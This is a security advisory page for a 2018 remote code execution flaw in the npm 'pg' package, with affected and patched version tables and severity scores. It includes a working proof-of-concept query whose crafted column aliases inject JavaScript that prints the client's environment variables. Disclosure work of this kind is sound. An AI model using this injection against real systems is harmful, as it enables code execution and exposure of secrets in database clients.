exploitDog

GHSA-wc9v-mj63-m9g5

Published: 24 Jul 2018
Source: github
GitHub: Reviewed
CVSS3: 9.8

Description

Remote Code Execution in pg

Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name. The affected releases build the per-row parsing function by concatenating column names into JavaScript source and compiling it, escaping only single quotes; a column name that breaks out of that string literal is therefore executed as code in the client process.

There are two specific scenarios in which it is likely for an application to be vulnerable:

  1. The application executes unsafe, user-supplied sql which contains malicious column names.
  2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

```js
const { Client } = require('pg')
// With no arguments, Client reads the connection parameters from the
// standard PG* environment variables (PGHOST, PGUSER, PGDATABASE, ...).
const client = new Client()
client.connect()
// Two column aliases: the first ends the string literal in the generated
// row parser and opens a block comment, the second closes the comment and
// appends arbitrary JavaScript that runs when the first row is parsed.
const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`
client.query(sql, (err, res) => {
  client.end()
})
```

Recommendation

  • Version 2.x.x: Update to version 2.11.2 or later.
  • Version 3.x.x: Update to version 3.6.4 or later.
  • Version 4.x.x: Update to version 4.5.7 or later.
  • Version 5.x.x: Update to version 5.2.1 or later.
  • Version 6.x.x: Update to version 6.4.2 or later. (Note that versions 6.0.5, 6.1.6, 6.2.5, and 6.3.3 are also patched; see the package table below.)
  • Version 7.x.x: Update to version 7.1.2 or later. (Note that version 7.0.2 is also patched.)

Packages

Name  Ecosystem  Affected versions    Patched version
pg    npm        < 2.11.2             2.11.2
pg    npm        >= 3.0.0, < 3.6.4    3.6.4
pg    npm        >= 4.0.0, < 4.5.7    4.5.7
pg    npm        >= 5.0.0, < 5.2.1    5.2.1
pg    npm        >= 6.0.0, < 6.0.5    6.0.5
pg    npm        >= 6.1.0, < 6.1.6    6.1.6
pg    npm        >= 6.2.0, < 6.2.5    6.2.5
pg    npm        >= 6.3.0, < 6.3.3    6.3.3
pg    npm        >= 6.4.0, < 6.4.2    6.4.2
pg    npm        >= 7.0.0, < 7.0.2    7.0.2
pg    npm        >= 7.1.0, < 7.1.2    7.1.2

EPSS

Percentile: 99%
Score: 0.70815
High

CVSS3

9.8 Critical

Weaknesses

CWE-94

Related vulnerabilities

CVSS3: 9.8
ubuntu
more than 7 years ago

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

CVSS3: 9.8
nvd
more than 7 years ago

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

CVSS3: 9.8
debian
more than 7 years ago

A remote code execution vulnerability was found within the pg module w ...
